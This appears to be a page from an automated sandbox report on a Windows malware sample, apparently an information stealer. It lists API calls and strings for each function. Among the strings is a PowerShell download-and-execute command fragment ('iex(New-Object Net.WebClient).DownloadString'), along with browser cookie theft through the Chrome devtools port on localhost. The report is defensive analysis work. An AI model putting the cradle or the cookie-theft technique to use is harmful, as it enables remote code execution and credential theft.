                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: e595ef2bfe912824a7791b9452ff55055a275a94bb6e818240755a95f93f479d
                                  • Instruction ID: b4dd6e029a6e7eaa1071c92437696a50a6712b3786a7f7d6dcedd981bc9601a8
                                  • Opcode Fuzzy Hash: e595ef2bfe912824a7791b9452ff55055a275a94bb6e818240755a95f93f479d
                                  • Instruction Fuzzy Hash: 1EB1B17191092A9FCB23EF64CC49ABF73BAAF00301F094525B909DB2A1DB74DD51CB91
                                  Function 004047E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,003F72A4), ref: 004047E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 004047FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0040480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 0040482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00404840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 00404851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 00404862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00404873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00404884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 00404895
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  • Opcode ID: 808c6d291458b798d18d55764900f741d885767afe8b793898be927add0b78b5
                                  • Instruction ID: 24e2995767b7c7a24220a6f52f353a222c82a485d7af9466d89f10303cd1244b
                                  • Opcode Fuzzy Hash: 808c6d291458b798d18d55764900f741d885767afe8b793898be927add0b78b5
                                  • Instruction Fuzzy Hash: 9211DD71E91710FF8711DFA4AC1DBD53ABABB4A70A31CA92BF551D3160DAF88040DB64
                                  Function 003FBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FBE53
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FBE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003FBE91
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FBEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003FBEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FBEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FBEEB
                                  • lstrlen.KERNEL32(')"), ref: 003FBEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FBF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 003FBF1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FBF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003FBF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FBF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003FBF94
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FBFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 003FC00C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  • Opcode ID: e0e0f581da4fb427268424269f414be3b2ecc6cbf9726ed3d6568829298dfe22
                                  • Instruction ID: f1320ce69984d4691dcdb7bc3d16cb5129247a1b66a5b5cc966c044019576ad9
                                  • Opcode Fuzzy Hash: e0e0f581da4fb427268424269f414be3b2ecc6cbf9726ed3d6568829298dfe22
                                  • Instruction Fuzzy Hash: FA61F471A1035A9BCB23AFB5DC89AEFBBA9AF04300F055136F505E7281DB74D9418BA0
                                  Function 00401820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 0040184F
                                  • lstrlen.KERNEL32(01196D30), ref: 00401860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004018C1
                                  • lstrlen.KERNEL32(00414FA0), ref: 004018D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004018F4
                                  • lstrcat.KERNEL32(00000000,00414FA0), ref: 00401900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0040192F
                                  • lstrlen.KERNEL32(01196D60), ref: 00401945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0040196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004019A6
                                  • lstrlen.KERNEL32(00414FA0), ref: 004019B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004019D9
                                  • lstrcat.KERNEL32(00000000,00414FA0), ref: 004019E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A14
                                  • lstrlen.KERNEL32(01196D80), ref: 00401A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A8B
                                  • lstrlen.KERNEL32(01196D90), ref: 00401AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401B02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: a0d6b96411700ac3aa8dd1f341658b78999e187d8c4a2d86d8695a5b27d31d4d
                                  • Instruction ID: 255cd1bf1e786dfbca9aabe0e5fd54021a57d3c92a905b70bc18defba38797e0
                                  • Opcode Fuzzy Hash: a0d6b96411700ac3aa8dd1f341658b78999e187d8c4a2d86d8695a5b27d31d4d
                                  • Instruction Fuzzy Hash: 77916FB16013039FD721AFB6DC98A5777EDAF04300B18953AB886D73A1DB78E941CB60
                                  Function 003F4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003F47C5
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F4812
                                  • lstrlen.KERNEL32(00414B60), ref: 003F481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F483A
                                  • lstrcat.KERNEL32(00000000,00414B60), ref: 003F4846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F48A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F48CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 003F48DC
                                  • lstrlen.KERNEL32(?), ref: 003F48F0
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F4931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F49B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F49E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4A5D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  • Opcode ID: 61a5f3d5872981ca43c0f8f1aab3827b5a5a108b2840ee253d76c4e6b4cfd828
                                  • Instruction ID: 7c7aa03f4d3ddb23198c3b881d7f5410967a7c3b60979fb3176aabfa9e6395f5
                                  • Opcode Fuzzy Hash: 61a5f3d5872981ca43c0f8f1aab3827b5a5a108b2840ee253d76c4e6b4cfd828
                                  • Instruction Fuzzy Hash: 8CB1D532A1025A9BCB23EF75D8859AF77B9AF40700F055238FD45AB291DF70ED018B90
                                  Function 003E92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003E90C0: InternetOpenA.WININET(0040CFEC,00000001,00000000,00000000,00000000), ref: 003E90DF
                                    • Part of subcall function 003E90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003E90FC
                                    • Part of subcall function 003E90C0: InternetCloseHandle.WININET(00000000), ref: 003E9109
                                  • strlen.MSVCRT ref: 003E92E1
                                  • strlen.MSVCRT ref: 003E92FA
                                    • Part of subcall function 003E8980: std::_Xinvalid_argument.LIBCPMT ref: 003E8996
                                  • strlen.MSVCRT ref: 003E9399
                                  • strlen.MSVCRT ref: 003E93E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 003E9547
                                  • lstrcat.KERNEL32(?,00411794), ref: 003E9559
                                  • lstrcat.KERNEL32(?,?), ref: 003E956A
                                  • lstrcat.KERNEL32(?,00414B98), ref: 003E957C
                                  • lstrcat.KERNEL32(?,?), ref: 003E958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 003E959F
                                  • lstrlen.KERNEL32(?), ref: 003E95B6
                                  • lstrlen.KERNEL32(?), ref: 003E95DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E9614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  • Opcode ID: b3935df9f0b7c91f5083c6fa782cd7619ac4b24e3e1fb2b356029506515fa415
                                  • Instruction ID: fc35919069c40f11d021093f26037ca2e00e0c043db86ed26572d4c88cac79cb
                                  • Opcode Fuzzy Hash: b3935df9f0b7c91f5083c6fa782cd7619ac4b24e3e1fb2b356029506515fa415
                                  • Instruction Fuzzy Hash: ECE13671E10268DBDF11DFA9D880BDEBBB5AF48300F1045AAE509A7281DB74AE45CF94
                                  Function 003FD980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 003FD9A1
                                  • memset.MSVCRT ref: 003FD9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FD9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FDA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FDA1C
                                  • lstrcat.KERNEL32(?,011B04A8), ref: 003FDA36
                                  • lstrcat.KERNEL32(?,?), ref: 003FDA4A
                                  • lstrcat.KERNEL32(?,011AED80), ref: 003FDA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FDA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003FDA95
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FDAFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  • Opcode ID: 17d641c8f1d96da6a1ce7c1f96fca56f67d557a9256485c4f8937ba89e126ecd
                                  • Instruction ID: da86441999a6a6fef1f63515411aaa92e86ae5b929445bf507190cde32484fc2
                                  • Opcode Fuzzy Hash: 17d641c8f1d96da6a1ce7c1f96fca56f67d557a9256485c4f8937ba89e126ecd
                                  • Instruction Fuzzy Hash: B0B1A2B2D102599FCB11EFA4DC989EE77BAAF48300F148569F606E7240DB709E44CB60
                                  Function 003EB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EB330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EB3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB3D9
                                  • lstrlen.KERNEL32(00414C50), ref: 003EB450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB474
                                  • lstrcat.KERNEL32(00000000,00414C50), ref: 003EB480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB4A9
                                  • lstrlen.KERNEL32(00000000), ref: 003EB52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EB55F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB587
                                  • lstrlen.KERNEL32(00414AD4), ref: 003EB5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB622
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003EB62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB65E
                                  • lstrlen.KERNEL32(?), ref: 003EB767
                                  • lstrlen.KERNEL32(?), ref: 003EB776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB79E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 6a3a8ce56acc9d48eceb7f7ef358e24203e3dbaf04daf096f2b7b9bd4b60f61c
                                  • Instruction ID: d9a51706c180a8d1d97c27056f3d2033ea42273e9028022e6419cef2f6095e28
                                  • Opcode Fuzzy Hash: 6a3a8ce56acc9d48eceb7f7ef358e24203e3dbaf04daf096f2b7b9bd4b60f61c
